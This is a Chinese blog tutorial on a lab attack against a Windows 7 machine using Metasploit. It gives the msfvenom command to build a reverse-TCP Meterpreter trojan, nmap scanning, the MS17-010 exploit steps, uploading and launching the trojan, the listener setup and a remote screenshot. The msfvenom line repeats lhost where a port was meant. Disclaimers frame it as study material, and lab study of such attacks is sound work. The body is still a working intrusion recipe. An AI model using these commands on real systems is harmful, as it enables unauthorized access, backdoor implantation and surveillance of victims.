msf木马实验 windows篇

132 阅读2分钟

免责声明:

本实验仅供学习参考,禁止用于非法用途!如用于非法行为,后果自行负责!

实验材料准备

kali linux,下载地址:www.kali.org/
windows系统,请自行寻找

一、制作木马程序

使用msf工具生成木马,命令如下:

msfvenom -p windows/meterpreter/reverse_tcp lhost=[kali的ip] lhost=[端口号] -f exe > [路径及程序名].exe

image.png

二、开始测试

  • 本实验木马不同于安卓木马,不需要二次加工,可以直接使用
1. 寻找目标

首先使用nmap扫描当前网段下活跃的主机: image.png

可以看到192.168.234.128这个ip是活跃的并且开启了445端口,使用nmap -O命令查看该主机系统信息: image.png 可以看到该地址下运行的是win7系统

2. 尝试突破

尝试以ms17-010漏洞攻击该地址,步骤如下;

  1. 启动msfconsole并选择该漏洞的攻击模块: image.png

  2. 测试该漏洞的可行性: image.png

  3. 测试结果为可行,设置参数准备攻击: image.png

输入options指令检查参数设置: image.png

确认无误后输入run指令开始运行: image.png 攻击成功

3. 植入并运行木马

上传通过msfvenom指令生成的木马,命令如下:

upload [木马的路径和程序名].exe [靶机的接收路径]

image.png

打开win7靶机可以看到上传成功: image.png

  1. 在kali中打开一个新的命令行窗口,启动msfconsole,并配置监听模块,指令如下:
use exploit/multi/handler    //启用监听模块
set payload windows/meterpreter/reverse_tcp    //设置payload
set LHOST [kali的ip]
set LPORT [端口号]

image.png 监听已开启

  1. 在利用漏洞攻击的窗口中启动上传的木马,步骤与命令如下:
shell     //进入win7系统的命令行
chcp 65001      //设置显示编码
start [木马名称].exe      //cd到木马位置后输入此命令开始运行木马

此时新命令行窗口接收到信号开始监听 image.png

  1. 输入screenshot指令截图一张: image.png 其余指令请自行尝试

实验结束

再次声明:

本实验仅供学习参考,禁止用于非法用途!如用于非法行为,后果自行负责!

  • 完成本实验后请立刻清除制作的所有木马程序,禁止传播流出!